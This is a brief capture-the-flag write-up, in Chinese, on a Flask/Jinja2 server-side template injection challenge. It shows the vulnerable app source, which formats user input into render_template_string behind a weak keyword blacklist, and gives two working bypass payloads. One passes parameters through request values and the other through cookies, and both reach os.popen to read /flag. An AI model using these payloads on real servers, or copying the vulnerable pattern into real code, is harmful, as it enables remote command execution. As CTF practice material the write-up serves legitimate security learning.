Werkzeug/1.0.1Python/3.8.7
    上题 EXP

    1. /?name={{lipsum|attr(request.values.a)|attr(request.values.b)(request.values.c)|attr(request.values.d)(request.values.tari)|attr(request.values.f)()}}&tari=cat%20/flag&a=__globals__&b=__getitem__&c=os&d=popen&f=read

    image.png

    源码

    1. from flask import Flask
    2. from flask import request
    3. from flask import render_template_string
    4. import re
    6. app = Flask(__name__)
    7. @app.route('/')
    8. def app_index():
    9.     name = request.args.get('name')
    10.     if name:
    11.         if re.search(r"\'|\"|args|\[|\_|os",name,re.I):
    12.             return ':('
    13.     template = '''
    14. {%% block body %%}
    15.     <div class="center-content error">
    16.         <h1>Hello</h1>
    17.         <h3>%s</h3>
    18.     </div> 
    19. {%% endblock %%}
    20. ''' % (request.args.get('name'))
    21.     return render_template_string(template)
    23. if __name__=="__main__":
    24.     app.run(host='0.0.0.0',port=80)

    多过滤了个 os ,感觉和没过滤差不多的,因为不是在这个参数里传参。
    直接用看源码EXP即可

    其他解法,Cookie传参

    1. /?name={{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}
    1. Cookie:x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()

    image.png